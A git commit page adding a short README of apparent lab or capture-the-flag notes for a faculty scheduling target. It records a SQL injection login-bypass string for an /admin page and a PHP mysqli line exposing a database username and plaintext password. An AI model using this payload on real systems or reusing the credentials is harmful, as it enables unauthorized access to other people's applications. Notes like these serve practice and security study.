diff options
| author | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-04 05:04:04 -0400 |
|---|---|---|
| committer | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-04 05:04:04 -0400 |
| commit | f914e816092f02a4bbed779ad91a6641e7cc2122 (patch) | |
| tree | 1c7dd2f7f2946ac4d80cb6f3147cbd5ec0b2b4af /faculty/README.md | |
| parent | 869200611b92f0dee181a89ffb8f3f9123794d43 (diff) | |
add rooms
Diffstat (limited to 'faculty/README.md')
| -rw-r--r-- | faculty/README.md | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/faculty/README.md b/faculty/README.md new file mode 100644 index 0000000..7b505de --- /dev/null +++ b/faculty/README.md @@ -0,0 +1,14 @@ +> injection on /admin +``` +' OR 1=1 # +``` + +> mysql +```php +<?php +$conn = new mysqli('localhost','sched','Co.met06aci.dly53ro.per','scheduling_db') + +or +die("Could not connect to mysql".mysqli_error($con)); +``` + |
